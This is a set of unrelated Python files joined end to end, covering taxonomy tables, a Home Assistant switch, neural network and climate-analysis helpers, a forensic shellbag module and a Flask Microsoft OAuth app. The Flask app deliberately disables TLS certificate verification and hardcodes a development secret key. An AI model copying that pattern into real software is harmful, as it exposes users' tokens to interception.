self.__seen[child] = 1 # tbl row x = [str(self.__graph_nodeIDs[child]), child, self.get_rank(child)] print('\t'.join(x)) # children self._to_tbl_iter(child) def to_tbl(self): """ Writing table of values [taxID, name, rank] """ ## writing header x = ['taxID', 'name', 'rank'] print('\t'.join(x)) ## writing root self.__seen = {} x = [str(self.__graph_nodeIDs['root']), 'root', 'no rank'] print('\t'.join(x)) self._to_tbl_iter('root') def _to_tbl_iter_idx(self, vertex, idx): for child in self.__graph_dict[vertex]: if child in self.__seen: continue self.__seen[child] = 1 # tbl row idx[child] = str(self.__graph_nodeIDs[child]) # children self._to_tbl_iter_idx(child, idx) def append_tbl(self, table_file, join_column): """ appending to table """ # creating index: name : [taxID, rank] idx = {} self.__seen = {} idx['root'] = str(self.__graph_nodeIDs['root']) self._to_tbl_iter_idx('root', idx) # appending to file out_file = os.path.splitext(table_file)[0] + '_wTaxIDs.tsv' header = OrderedDict() with open(table_file) as inF, open(out_file, 'w') as outF: for i,line in enumerate(inF): line = line.rstrip().split('\t') if i == 0: header = {x:i for i,x in enumerate(line)} header['gtdb_taxid'] = len(header.keys()) + 1 if not join_column in header.keys(): msg = 'Cannot find column "{}" in file: {}' raise ValueError(msg.format(join_column, table_file)) outF.write('\t'.join(header) + '\n') else: acc = line[header[join_column]] try: line.append(idx[acc]) except KeyError: msg = 'Cannot find "{}" in the taxID index' logging.info(msg.format(acc)) line.append('NA') outF.write('\t'.join(line) + '\n') logging.info('File written: {}'.format(out_file)) def find_all_paths(self, start_vertex, end_vertex, path=[]): """ find all paths from start_vertex to end_vertex in graph """ graph = self.__graph_dict path = path + [start_vertex] if start_vertex == end_vertex: return [path] if start_vertex not in graph: return [] paths = [] for vertex in graph[start_vertex]: if vertex not in path: extended_paths = self.find_all_paths(vertex, end_vertex, path) for p in extended_paths: paths.append(p) return paths """Entity Xplora® Watch.""" from __future__ import annotations import logging from datetime import timedelta from typing import Any, Dict from homeassistant.components.switch import SwitchEntity from homeassistant.helpers.restore_state import RestoreEntity from .helper import XploraUpdateTime from pyxplora_api import pyxplora_api_async as PXA _LOGGER = logging.getLogger(__name__) class XploraSwitchEntity(XploraUpdateTime, SwitchEntity, RestoreEntity): def __init__( self, switch: Dict[str, Any], controller: PXA.PyXploraApi, scan_interval: timedelta, start_time: float, name: str, func_name: str, icon: str, ) -> None: super().__init__(scan_interval, start_time) _LOGGER.debug(f"init switch {func_name} {name}") self._controller: PXA.PyXploraApi = controller self._switch = switch self._attr_icon = icon self._attr_is_on = self._state(self._switch["status"]) self._attr_name = name self._attr_unique_id = switch["id"] def _state(self, status: str) -> bool: if status == "DISABLE": return False return True @property def extra_state_attributes(self) -> dict[str, Any]: """Return supported attributes.""" days = ["So", "Mo", "Di", "Mi", "Do", "Fr", "Sa"] weekRepeat = self._switch["weekRepeat"] weekDays = [] for day in range(len(weekRepeat)): if weekRepeat[day] == "1": weekDays.append(days[day]) return {"Day(s)": ", ".join(weekDays)} from model.model import RedshiftClassifierResNet, RedshiftClassifierInception from model.eval_model import 
eval_models from train import train_model from pickle import load train_data_file = <TRAIN_DATA_LOC> test_data_file = <TEST_DATA_LOC> results_file = <SAVE_LOC> with open(train_data_file,'rb') as pkl: train_imgs = load(pkl) train_labels = load(pkl) image_shape = (64,64,5) num_classes = 32 epochs = 20 max_val=0.4 models = [ RedshiftClassifierResNet(image_shape, num_classes), RedshiftClassifierInception(image_shape, num_classes) ] model_labels = [ 'resnet', 'incep' ] data_label = 'SDSS' for i, mod in enumerate(models): train_model(mod, train_imgs, train_labels, model_labels[i], data_label, epochs=epochs, max_rs_val=max_val) model_dirs = ['model/saved/'+lab+'/' for lab in model_labels] eval_models(models, test_data_file, model_dirs, model_labels, results_file, max_val)from ..base import ComparerMixin from ..MatchingResult import MatchingResult, MatchingType import Levenshtein class TokenCategoryComparer(ComparerMixin): def compare(self, lhs, rhs, original_lhs, original_rhs, **parameters): abbreviations_lhs = lhs[0] company_words_lhs = lhs[1] abbreviations_rhs = rhs[0] company_words_rhs = rhs[1] number_of_entity_words = len(abbreviations_lhs) + len(company_words_lhs) + len(abbreviations_rhs) + len(company_words_rhs) if number_of_entity_words > parameters.get("maximal_entity_words_unmatched", 1): return MatchingResult.NoMatch() if number_of_entity_words > 0: self.additional_flag = MatchingType.Additional <gh_stars>0 # input the number of items in group a and b from collections import defaultdict # d = defaultdict(list) # a, b = map(int, input().split()) # list1 = [] # # # defaultdict(<class 'list'>, {'a': [1, 2, 4], 'b': [3, 5]}) # for i in range(a): # d[input()].append(i+1) # # for i in range(b): # list1 += input() # # for i in list1: # if i in d: # print(" ".join(map(str, d[i]))) # else: # print(-1) n, m = map(int, input().split()) d = defaultdict(list) for i in range(1, n + 1): d[input()].append(str(i)) print(d) for i in range(m): print(' '.join(d[input()]) or -1) """ Author: <NAME>: <EMAIL> Website: http://valeriovelardo.com Python AI mailing list (free AI and ML tutorials): https://bit.ly/2K4gqE5 This file contains an implementation of a simple feedforward neural network. """ # Remember to pip install the numpy library, if you haven't downloaded it # already! import numpy as np class FeedForwardNet(object): """A class that represents a simple feedforward neural network, with an input layer, a hidden layer and an output layer. The layers are fully connected:each neuron of a layer, is connected with all the neurons of the following layer. """ def __init__(self, x, y, numNeuronsHiddenLayer=5): """Class constructor Args: x (numpy array): Training input data in the form of a 2d array y (numpy array): Training output represented as a 2d array numNeuronsHiddenLayer (int): Number of neurons of the hidden layer of the network. Defaulted to 5. 
""" super(FeedForwardNet, self).__init__() # training input data self.input = x # get number of input neurons from training data numInputNeurons = self.input.shape[1] # randomise weights between input and hidden layer self.weights1 = np.random.rand(numInputNeurons, numNeuronsHiddenLayer) # randomise weights between hidden and output layer self.weights2 = np.random.rand(numNeuronsHiddenLayer,1) self.y = y # initialise output of the network with all zeros self.output = np.zeros(self.y.shape) def feedforward(self): """Apply feedforward propagation.""" # calculate dot product between input layer and 1st layer of weights dotProductLayer1 = np.dot(self.input, self.weights1) # apply sigmoid activation function self.layer1 = self._sigmoid(dotProductLayer1) # calculate dot product between hidden layer and 2nd layer of weights dotProductLayer2 = np.dot(self.layer1, self.weights2) # apply sigmoid activation function self.output = self._sigmoid(dotProductLayer2) def backpropagation(self): """Propagate the error back, and update weights and biases. Sum of square errors is used as the loss function.""" # calculate the derivative of the loss function with respect to # weights2 d_loss_function2 = (2*(self.y - self.output) * self._sigmoid_derivative(self.output)) d_weights2 = np.dot(self.layer1.T, d_loss_function2) # calculate the derivative of the loss function with respect to # weights1 d_loss_function1 = (np.dot(2*(self.y - self.output) * self._sigmoid_derivative(self.output), self.weights2.T) * self._sigmoid_derivative(self.layer1)) d_weights1 = np.dot(self.input.T, d_loss_function1) # update the weights with the derivative of the loss function self.weights1 += d_weights1 self.weights2 += d_weights2 def train(self, epochs): """Train network using feedforward and back propagations. 
Args: epochs (int): Number of times we process the training data """ for _ in range(epochs): self.feedforward() self.backpropagation() def _sigmoid(self, x): return 1.0 / (1 + np.exp(-x)) def _sigmoid_derivative(self, x): return x * (1.0 - x) if __name__ == "__main__": # training set for logic 'and' x = np.array([[0, 0], [0, 1], [1, 0], [1, 1]]) # training output y = np.array([[0],[0],[0],[1]]) # instantiate neural net ffn = FeedForwardNet(x,y) # train for 1500 epochs ffn.train(1500) print(ffn.output) #!/usr/bin/env python -*- coding: utf-8 -*- import argparse import codecs import utils from sklearn.decomposition import PCA from sklearn.utils import shuffle from numpy import stack, dot, save if __name__ == "__main__": parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('-m', '--model', required=True, help='gensim LSA or word2vec binary model') parser.add_argument('-t', '--type', required=True, help='model type: lsa, w2v') parser.add_argument('-p', '--positive', required=True, help='positive word seeds file') parser.add_argument('-n', '--negative', required=True, help='negative word seeds file') parser.add_argument('-r', '--ratio', required=False, type=float, default=1.0, help='sample ratio') parser.add_argument('-k', '--number', required=False, type=int, default=10, help='number of components to keep') parser.add_argument('-c', '--components', required=True, help='output principal components') parser.add_argument('-s', '--similarity', required=False, default="cosine", help='similarity metric: cosine, dot') parser.add_argument('-i', '--incomponents', required=False, help='input subspace components (.npy)') args = parser.parse_args() vsm = utils.VSM(args.type, args.model, args.incomponents) positive_words = set(line.strip() for line in codecs.open(args.positive,'rb','utf8') if line.strip() in vsm) negative_words = set(line.strip() for line in codecs.open(args.negative,'rb','utf8') if line.strip() in vsm) vsm_array = vsm.get_array(list(positive_words)+list(negative_words)) X = stack(vsm_array) if args.similarity == "cosine": for i in xrange(X.shape[0]): X[i] = utils.unitvec(X[i]) pca = PCA(n_components=args.number) pca.fit(shuffle(X, n_samples=int(len(vsm_array)*args.ratio))) print('explained variance ratio: %s' % str(pca.explained_variance_ratio_)) for i in xrange(args.number): postive_sum = 0 for x in X[0:len(positive_words)]: postive_sum += dot(pca.components_[i], x) if postive_sum < 0: pca.components_[i] = -pca.components_[i] save(args.components, pca.components_)<reponame>dfrc-korea/carpe<filename>modules/shellbag_connector.py # -*- coding: utf-8 -*- """module for shellbags.""" import os from modules import manager from modules import interface from modules.OverTheShellbag import OverTheShellbag as shellbag class ShellbagConnector(interface.ModuleConnector): NAME = 'shellbag_connector' DESCRIPTION = 'Module for Shellbag' _plugin_classes = {} def __init__(self): super(ShellbagConnector, self).__init__() def Connect(self, par_id, configuration, source_path_spec, knowledge_base): this_file_path = os.path.dirname(os.path.abspath(__file__)) + os.sep + 'schema' + os.sep + 'registry' + os.sep yaml_list = [this_file_path + 'lv1_os_win_reg_shellbag.yaml'] table_list = ['lv1_os_win_reg_shellbag'] if not self.check_table_from_yaml(configuration, yaml_list, table_list): return False # This is not OS partition if len(knowledge_base._user_accounts.values()) == 0: # print("There are no Registry") return False # TODO file path list를 뽑아야함 username 
= list() for user_accounts in knowledge_base._user_accounts.values(): for hostname in user_accounts.values(): if hostname.identifier.find('S-1-5-21') == -1: continue username.append(hostname.username) query_separator = self.GetQuerySeparator(source_path_spec, configuration) path_separator = self.GetPathSeparator(source_path_spec) for user in username: filepath = f'root{query_separator}Users{query_separator}{user}{query_separator}' \ f'AppData{query_separator}Local{query_separator}Microsoft{query_separator}Windows' query = f"SELECT name, parent_path FROM file_info WHERE par_id = '{par_id}' and " \ f"((name like 'UsrClass.dat' and parent_path like '{filepath}') or " \ f"(name like 'UsrClass.dat.LOG1' and parent_path like '{filepath}') or " \ f"(name like 'UsrClass.dat.LOG2' and parent_path like '{filepath}'))" results = configuration.cursor.execute_query_mul(query) if len(results) == 0 or results == -1: #print("There are no shellbag files") return False file_objects = { "primary": None, "log1": None, "log2": None } for file in results: if file[0] == 'UsrClass.dat' or file[0] == 'usrClass.dat': file_objects['primary'] = self.LoadTargetFileToMemory(source_path_spec=source_path_spec, configuration=configuration, file_path=file[1][4:] + path_separator + file[0]) elif file[0] == 'UsrClass.dat.LOG1' or file[0] == 'usrClass.dat.LOG1': file_objects['log1'] = self.LoadTargetFileToMemory(source_path_spec=source_path_spec, configuration=configuration, file_path=file[1][4:] + path_separator + file[0]) elif file[0] == 'UsrClass.dat.LOG2' or file[0] == 'usrClass.dat.LOG2': file_objects['log2'] = self.LoadTargetFileToMemory(source_path_spec=source_path_spec, configuration=configuration, file_path=file[1][4:] + path_separator + file[0]) shellbag_results = shellbag.Main(file_objects) # if file_objects['primary']: # file_objects['primary'].close() # if file_objects['log1']: # file_objects['log1'].close() # if file_objects['log2']: # file_objects['log2'].close() info = [par_id, configuration.case_id, configuration.evidence_id, user] insert_shellbag_info = [] for item in shellbag_results: item[3] = configuration.apply_time_zone(item[3], knowledge_base.time_zone) # modification_time item[4] = configuration.apply_time_zone(item[4], knowledge_base.time_zone) # access_time item[5] = configuration.apply_time_zone(item[5], knowledge_base.time_zone) # creation_time item[6] = configuration.apply_time_zone(item[6], knowledge_base.time_zone) # last_written_time item = info + item insert_shellbag_info.append(tuple(item)) query = f"Insert into {table_list[0]} values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);" configuration.cursor.bulk_execute(query, insert_shellbag_info) manager.ModulesManager.RegisterModule(ShellbagConnector) <gh_stars>0 from flask import Flask, redirect, url_for, session, request, jsonify, render_template from flask_oauthlib.client import OAuth, OAuthException import requests # from flask_sslify import SSLify from logging import Logger import uuid # disable ssl cert check import ssl from flask_oauthlib.client import OAuth, prepare_request, http def net_http_request(uri, headers=None, data=None, method=None): ''' Method for monkey patching 'flask_oauthlib.client.OAuth.http_request' This version allows for insecure SSL certificates ''' uri, headers, data, method = prepare_request( uri, headers, data, method ) req = http.Request(uri, headers=headers, data=data) req.get_method = lambda: method.upper() try: resp = http.urlopen(req, context=ssl._create_unverified_context()) content = 
resp.read() resp.close() return resp, content except http.HTTPError as resp: content = resp.read() resp.close() return resp, content app = Flask(__name__) # sslify = SSLify(app) app.debug = True app.secret_key = 'development' oauth = OAuth(app) # Put your consumer key and consumer secret into a config file # and don't check it into github!! microsoft = oauth.remote_app( 'microsoft', #consumer_key='Your microsoft application id. refer the readme', #consumer_secret='Your microsoft applicaiton password. refer the readme', consumer_key='<KEY>', consumer_secret='<KEY>', request_token_params={'scope': 'offline_access User.Read Notes.Read Notes.Read.All Notes.ReadWrite.CreatedByApp Notes.Create Notes.ReadWrite.All'}, base_url='https://graph.microsoft.com/v1.0/', request_token_url=None, access_token_method='POST', access_token_url='https://login.microsoftonline.com/common/oauth2/v2.0/token', authorize_url='https://login.microsoftonline.com/common/oauth2/v2.0/authorize', ) microsoft.http_request = net_http_request @app.route('/') def index(): return render_template('hello.html') @app.route('/login', methods=['POST', 'GET']) def login(): if 'microsoft_token' in session: return redirect(url_for('me')) # Generate the guid to only accept initiated logins guid = uuid.uuid4() session['state'] = guid return microsoft.authorize(callback=url_for('authorized', _external=True), state=guid) @app.route('/logout', methods=['POST', 'GET']) def logout(): session.pop('microsoft_token', None) session.pop('state', None) return redirect(url_for('index')) @app.route('/listNotebooks', methods=['GET']) def listNotebooks(): headers = { #'User-Agent' : 'python_tutorial/1.0', 'Authorization' : 'Bearer {0}'.format(session['microsoft_token'][0]) #'Accept' : 'application/json', #'Content-Type' : 'application/json' } request_id = str(uuid.uuid4()) instrumentation = {'client-request-id' : request_id, 'return-client-request-id' : 'true'} headers.update(instrumentation) url = "https://graph.microsoft.com/v1.0/me/onenote/notebooks" response = requests.get(url=url,headers=headers) print(response) return redirect(url_for('index')) @app.route('/login/authorized') def authorized(): response = microsoft.authorized_response() if response is None: return "Access Denied: Reason=%s\nError=%s" % ( response.get('error'), request.get('error_description') ) # Check response for state print("Response: " + str(response)) if str(session['state']) != str(request.args['state']): raise Exception('State has been messed with, end authentication') # Okay to store this in a local variable, encrypt if it's going to client # machine or database. Treat as a password. 
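# --- Sketch only (not part of the source app): a certificate-verifying counterpart
# to the net_http_request monkey patch defined above. It reuses prepare_request and
# http from flask_oauthlib.client exactly as the original does; only the function
# name verified_http_request is new here.
def verified_http_request(uri, headers=None, data=None, method=None):
    uri, headers, data, method = prepare_request(uri, headers, data, method)
    req = http.Request(uri, headers=headers, data=data)
    req.get_method = lambda: method.upper()
    try:
        # ssl.create_default_context() keeps certificate verification enabled,
        # unlike the ssl._create_unverified_context() used in net_http_request.
        resp = http.urlopen(req, context=ssl.create_default_context())
        content = resp.read()
        resp.close()
        return resp, content
    except http.HTTPError as resp:
        content = resp.read()
        resp.close()
        return resp, content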
session['microsoft_token'] = (response['access_token'], '') return redirect(url_for('me')) @app.route('/me') def me(): me = microsoft.get('me') return render_template('me.html', me=str(me.data)) # If library is having trouble with refresh, uncomment below and implement refresh handler # see https://github.com/lepture/flask-oauthlib/issues/160 for instructions on how to do this # Implements refresh token logic # @app.route('/refresh', methods=['POST']) # def refresh(): @microsoft.tokengetter def get_microsoft_oauth_token(): return session.get('microsoft_token') if __name__ == '__main__': app.run(host='127.0.0.1', ssl_context='adhoc') # -*- coding: utf-8 -*- """Python package for audio analysis""" from soundly import metadata __version__ = metadata.version __author__ = metadata.authors[0] __license__ = metadata.license __copyright__ = metadata.copyright import time from testify import * import blueox class SimpleTestCase(TestCase): def test(self): context = blueox.Context('test', 1) with context: with blueox.timeit('test_time'): time.sleep(0.25) assert 1.0 > context.data['test_time'] > 0.0 snk(san(src(x))) <gh_stars>0 # python 3 # <NAME> """This python file will keep a record of all the functions created for cmip6 dataset analysis""" import numpy as np import datetime as dt def time_dim_dates(base_date = dt.date(1850,1,1) ,total_timestamps=3012): """this python function create a time or date values for 15th of \ every month from the start date,entered as year,month,day\ and until the timestamps or the length of the timeseries""" from calendar import monthrange import datetime as dt import numpy as np fd = base_date+dt.timedelta(14) #first date in the list dates_list = [fd] for i in range(total_timestamps-1): fd = dt.date(fd.year,fd.month,monthrange(fd.year,fd.month)[1])+dt.timedelta(15) dates_list .append(fd) dates_array = np.array(dates_list) return dates_array def index_and_dates_slicing(dates_array,start_date,end_date): """This function will generate two np arrays 1. the indices of the selected dates relative to the original input array 2. the dates array from start_date to end the end date ----- Inputs: ------- 1. dates_array > numpy array with dates format datetime.date(YEAR,MO,DY) 2. start_date > datetime.date(YEAR,MO,DY) 3. end_date > datetime.date(YEAR,MO,DY) Both start and end date are inclusive""" import datetime as dt import numpy as np idx_dates_list=[] for i, j in enumerate(dates_array): idx_dates_list .append((i,j)) idx_dates_array = np.array(idx_dates_list) idx_array = idx_dates_array[(idx_dates_array[:,1]>=start_date) & (idx_dates_array[:,1]<=end_date)][:,0] dates_array = idx_dates_array[(idx_dates_array[:,1]>=start_date) & (idx_dates_array[:,1]<=end_date)][:,1] return idx_array,dates_array def geo_idx(dd, dd_array): """ Search for nearest decimal degree in an array of decimal degrees and return the index. np.argmin returns the indices of minium value along an axis. so subtract dd from all values in dd_array, take absolute value and find index of minium. Inputs: ______ dd : the value whose index you want to find (lat : 30N = -30.) dd_array: the list of values for your search (lats: -90 ... 90) Outputs: _______ geo_idx : The index of the value closest to the one present in the pool of values """ import numpy as np geo_idx = (np.abs(dd_array - dd)).argmin() return geo_idx def mpi_local_and_global_index(begin_idx, local_n): """ This function will return a list of tuples with a local index and the global index of the given value of begin index and local chunk size for mpi. 
The reason why we need this is because the we can run a for loop with two indicies if they are provided in a tuple form.\n Input: ------------ begin_index : of the lat/lon running on the local processor when using mpi local_n : the chunk size of the array we want to run on that processor Output: ----------- result : a list of tuple (local_idx,global_idx) """ local_idx= 0 result = [] for i in range(local_n): result.append((local_idx,begin_idx)) begin_idx += 1 local_idx += 1 return result def ts_lagged(ts,lag = 0, maxlag=3): """This function will shift the timeseries or 1d array based on the lag and maxlags in the analysis. The main reason is that if you want to make code general to accept lags as input, its important that the structure/size of the ts are same. Note: lag should not be more than the maxlag""" import numpy as np ts = np.array(ts) if lag < maxlag: return ts[maxlag-lag:(None if lag==0 else -lag)] elif lag == maxlag : return ts[:-lag] else: return "lag <= maxlag" def percentile_colorbar(input_array,in_percentile=99,other=True): """This function will take a list/nd array as first input agrument, the second input argument is the percentile of the value interested in (default = 99). The function will mask all the nans and find the percentile only on the non_nans. The output will give you the largest nth percentile and smallest nth""" import numpy as np input_array = np.ma.masked_invalid((np.array(input_array)).flatten()) non_nans_l = input_array[~np.isnan(input_array)] if in_percentile < 1: in_percentile = in_percentile*100 max_value = np.percentile(non_nans_l,in_percentile) if other == False: return max_value else: min_value = np.percentile(non_nans_l,100-in_percentile) return max_value,min_value def adjaceny_matrix(struct_id): if struct_id == 0: #small extext short duration #struct_cat = structs[struct_id] struct_mat = np.zeros((3,3,3),dtype=int) struct_mat[1,1,1] = 1 elif struct_id == 1: #small extext long duration #struct_cat = structs[struct_id] struct_mat = np.zeros((3,3,3),dtype=int) struct_mat[:,1,1] = 1 elif struct_id == 2: #large extext short duration # struct_cat = structs[struct_id] struct_mat = np.zeros((3,3,3),dtype=int) struct_mat[1,:,:] = 1 elif struct_id == 3: #large extext long duration or 26 neighbours # struct_cat = structs[struct_id] struct_mat = np.ones((3,3,3),dtype=int) elif struct_id == 4: #18 neighbours struct_mat = np.zeros((3,3,3),dtype = int) struct_mat[1,:,:] = np.ones((3,3),dtype = int) struct_mat[0,:,1] = int(1) struct_mat[2,:,1] = int(1) struct_mat[0,1,:] = int(1) struct_mat[2,1,:] = int(1) else: # 6 neighbors struct_mat = np.zeros((3,3,3),dtype = int) struct_mat[1,:,1] = int(1) struct_mat[1,1,:] = int(1) struct_mat[0,1,1] = int(1) struct_mat[2,1,1] = int(1) """ Standard types: https://www.mathworks.com/help/images/ref/bwconncomp.html http://what-when-how.com/computer-graphics-and-geometric-modeling/raster-algorithms-basic-computer-graphics-part-1/ """ return struct_mat #Create a Matrix of subsequent whole numbers of the same shape as the global grid def create_seq_mat(nlat =192, nlon = 288): """ This function will create a 2d matrix from 0 to nlat*nlon rows = nlat cols = nlon """ import numpy as np mat = np.zeros((nlat,nlon)) for i in range(nlat): mat[i,:] = np.arange(i*nlon, (i+1)*nlon) return np.asarray(mat, dtype =int) def cumsum_lagged (ar,lag=1): """ This code will cumsum the given array and the previous lagged values and return one array of the same length as input ar Inputs: _______ ar : 1-d array lag: num of lagged values you want to cumsum 
Output: ______ cumsumed array 1d same length as ar """ import numpy as np if lag == 0: cum_ar = ar else: cum_ar = np.ma.masked_all((ar.size,lag+1)) cum_ar[:,0] = ar for l in range(lag): cum_ar[l+1:,l+1] = ar[:-(l+1)] return cum_ar.sum(axis=1) def cumsum_lagged (ar,lag=1, ignore_t0 = False): """ This code will cumsum the given array and the previous lagged values and return one array of the same length as input ar (mainly to check the affect of drivers on gpp) Inputs: _______ ar : 1-d array lag: num of lagged values you want to cumsum ignore_t0 : True/False since the current climate conditions (esp. for PME) where anti correlated with neg gpp ext for lag = 0 it was decided to check for the possible cases where we can ignore the current condition value for lag = 0 in cumlag effects Output: ______ cumsumed array 1d same length as ar """ import numpy as np ar = np.array(ar) if (lag == 0 and ignore_t0 == False): cum_ar = ar return cum_ar elif (lag>0 and ignore_t0 == False): cum_ar = np.ma.masked_all((ar.size,lag+1)) cum_ar[:,0] = ar for l in range(lag): cum_ar[l+1:,l+1] = ar[:-(l+1)] return cum_ar.sum(axis=1) else: if lag ==1: cum_ar = np.ma.masked_all((ar.size)) cum_ar [lag:] = ar[:-lag] return cum_ar else: cum_ar = np.ma.masked_all((ar.size,lag)) cum_ar[1:,0] = ar[:-1] for l in range(1,lag): cum_ar[l+1:,l] = ar[:-(l+1)] return cum_ar.sum(axis=1) def cum_av_lagged (ar,lag=1, ignore_t0 = True): """ This code will cumsum and then mean/average the given array and the previous lagged values and return one array of the same length as input ar Inputs: ------- ar : 1-d array lag: num of lagged values you want to cum_mean (cum_sum and then average) ignore_t0 : True/False since the current climate conditions (esp. for PME) where anti correlated with neg gpp ext for lag = 0 it was decided to check for the possible cases where we can ignore the current condition value for lag = 0 in cumlag effects Output: ------- cumsumed array 1d same length as ar """ import numpy as np ar = np.array(ar) if (lag == 0 and ignore_t0 == False): cum_ar = ar result = cum_ar elif (lag>0 and ignore_t0 == False): cum_ar = np.ma.masked_all((ar.size,lag+1)) cum_ar[:,0] = ar for l in range(lag): cum_ar[l+1:,l+1] = ar[:-(l+1)] result = cum_ar.sum(axis=1) else: if lag ==1: cum_ar = np.ma.masked_all((ar.size)) cum_ar [lag:] = ar[:-lag] result = cum_ar else: cum_ar = np.ma.masked_all((ar.size,lag)) cum_ar[1:,0] = ar[:-1] for l in range(1,lag): cum_ar[l+1:,l] = ar[:-(l+1)] result= cum_ar.sum(axis=1) if ignore_t0 == True: return result/lag else: return result/(lag+1) def label_count_locations(bin_ar, min_event_size = 3, lag= None): """ this function will us the ndimage package to find the linear continuous events and return is in the form of a dictionary also, it will return the the arguments of the begining point of these events this information can be used to find the triger of extreme events Inputs: ------- ar : 1-d array binary array of extremes min_event_size : the minimun size that will filter the extreme events and report the first args Outputs: ------- dict : Dictionary with label keys and subsequent counts and locations of extreme events ext_arg : The first argument of the extreme events in 'ar' """ from scipy import ndimage import numpy as np dic = {} larray,narray = ndimage.label(bin_ar,structure = np.ones(3)) locations = ndimage.find_objects(larray) for idx, l in enumerate (np.unique(larray, return_counts = True)[0]): if (l>0 and np.unique(larray, return_counts = True)[1][idx] >= min_event_size) : dic[l] = {} 
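# --- Worked example for cumsum_lagged / cum_av_lagged above (the sample array is
# made up for illustration). With lag=2 and ignore_t0=False every element is summed
# with up to two preceding values, so [1, 2, 3, 4, 5] -> [1, 3, 6, 9, 12]; the
# leading positions simply have fewer terms because the missing lags are masked.
import numpy as np
demo = np.array([1., 2., 3., 4., 5.])
print(cumsum_lagged(demo, lag=2, ignore_t0=False))   # [1.0 3.0 6.0 9.0 12.0]
print(cum_av_lagged(demo, lag=2, ignore_t0=False))   # the same sums divided by lag+1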
dic[l]['counts'] = np.unique(larray, return_counts = True)[1][idx] dic[l]['loc'] = locations[idx-1] args = np.arange(len(bin_ar)) ext_arg = [] for k in dic.keys(): ext_arg.append(args[dic[k]['loc'][0]][0]) ext_arg = np.array(ext_arg) ext_arg = ext_arg[ext_arg>=lag] return dic, ext_arg def patch_with_gaps(bin_ar, max_gap =3, lag = None): """ this function will use the ndimage package to find the linear continuous events and return it in the form of a dictionary also, it will return the the arguments of the begining point of these events this information can be used to find the triger of extreme events This function will make events continuous with gaps e.g. max_gaps = 2 > [1,1,0,0,0,1,1,0,0,1,1,0,1] with have 2 extremes Inputs: ------- ar : 1-d array binary array of extremes max_gape : the maximum gap size that will filter the extreme events and report the first args Outputs: ------- dict : Dictionary with label keys and subsequent counts and locations of extreme events ext_arg : The first argument of the extreme events in 'ar' """ from scipy import ndimage import numpy as np dic = {} larray,narray = ndimage.label(bin_ar,structure = np.ones(3)) locations = ndimage.find_objects(larray) for idx, l in enumerate (np.unique(larray, return_counts = True)[0]): if l>0: dic[l] = {} dic[l]['counts'] = np.unique(larray, return_counts = True)[1][idx] dic[l]['loc'] = locations[idx-1] args = np.arange(len(bin_ar)) start_args = [] for k in dic.keys(): start_args.append(args[dic[k]['loc'][0]][0]) end_args = [] for k in dic.keys(): end_args.append(args[dic[k]['loc'][0]][-1]) gaps = np.array(start_args[1:]) - np.array(end_args[:-1])-1 gaps_mask = ~(gaps <= max_gap) new_start_args = np.zeros((gaps_mask.sum() +1)) new_start_args[0] = start_args[0] new_start_args[1:] = np.array(start_args[1:])[gaps_mask] new_start_args = np.asarray(new_start_args, dtype = int) new_start_args = new_start_args [new_start_args>=lag] return dic, new_start_args def patch_with_gaps_and_eventsize(bin_ar, max_gap =2, min_cont_event_size =3, lag = None): """ this function will use the ndimage package to find the 1-D continuous events and return it in the form of a dictionary also, it will return the the arguments of the begining point of these events this information can be used to find the triger of extreme events This function will make events continuous with gaps e.g. 
max_gaps = 2 > [1,1,1,0,0,0,1,1,0,0,1,1,1,0,1] with have 2 extremes Inputs: ------- bin_ar : 1-d array binary array of extremes max_gap : the maximum gap size that will filter the extreme events and report the first args Outputs: ------- dict : Dictionary with label keys and subsequent counts and locations of extreme events ext_arg : The first argument of the extreme events in 'ar' """ from scipy import ndimage import numpy as np bin_ar = np.asarray(bin_ar, dtype = int) bin_ar_0s = np.zeros(bin_ar.shape) bin_ar_0s[lag:] = bin_ar[lag:] del bin_ar bin_ar = bin_ar_0s dic = {} larray,narray = ndimage.label(bin_ar,structure = np.ones(3)) # this command labels every continuous event uniquely and also return total number of continuous events locations = ndimage.find_objects(larray) # this command gives the location of the extremes for every label for idx, l in enumerate (np.unique(larray, return_counts = True)[0]): # returns the labels names starting with 1 and total cells with that label if l>0: dic[l] = {} dic[l]['counts'] = np.unique(larray, return_counts = True)[1][idx] # for every label saving the counts dic[l]['loc'] = locations[idx-1] # for every label saving the location args = np.arange(len(bin_ar)) # the arguments or index numbers of 'bin_ar' start_args = [] for k in dic.keys(): start_args.append(args[dic[k]['loc'][0]][0]) # list start args/idx (wrt bin_ar) of the events end_args = [] for k in dic.keys(): end_args.append(args[dic[k]['loc'][0]][-1]) # list of end args/idx (wrt bin_ar) of the events gaps = np.array(start_args[1:]) - np.array(end_args[:-1])-1 # ar: gaps/discontinuity(in months) between subsequent events gaps_mask = ~(gaps <= max_gap) # this is the mask of the gaps where the gaps are more than 'max_gap' i.e. gaps>max_gap are True ... 
# by doing so the events with a larger gap are separate and all other are continuous new_start_args = np.zeros((gaps_mask.sum() +1)) # total events will be one more than number of qualified continuoous event new_start_args[0] = start_args[0] # first arg will be the same as ori start_args new_start_args[1:] = np.array(start_args[1:])[gaps_mask] # all others will follow the new discrete first arg new_start_args = np.asarray(new_start_args, dtype = int) new_end_args = np.zeros((gaps_mask.sum() +1)) # the same goes for the end_args new_end_args[-1] = end_args[-1] new_end_args[:-1] = np.array(end_args[:-1])[gaps_mask] new_end_args = np.asarray(new_end_args, dtype = int) new_mask = new_start_args>=lag #incase the lags are considered you have to ingore the first few agrs = to the len of lag new_start_args = new_start_args [new_mask] #with lag new_end_args = new_end_args [new_mask] #with lag new_events = {} for idx in range(len(new_start_args)): new_events[idx] = bin_ar[new_start_args[idx]:new_end_args[idx]+1] # gives you the list of new events after checking for gaps more than max_gap only new_events = {} i=0 triggers = [] for idx in range(len(new_start_args)): bin_event = bin_ar[new_start_args[idx]:new_end_args[idx]+1] # checking on all qualified previous continuous events with gap larray,narray = ndimage.label(bin_event,structure = np.ones(3)) # generating the labels and the total arrays for the new selected continuous events with gap ev_size = np.unique(larray, return_counts = True)[1] # event size of the different extreme events without gaps within the selected continous events with gaps if (ev_size>= min_cont_event_size).sum() >=1: # looking for any events which is atleast 3-months continuous new_events[i] = bin_event i=i+1 triggers.append(new_start_args[idx]) triggers = np.asarray(triggers, dtype = int) #'new_events' are the qualified continuous events with gaps and at-least one 3 month continuous event #'triggers' are the first args of new events return new_events, triggers #to nomalize a timeseries in order to compare everything in a way they are meant to be! 
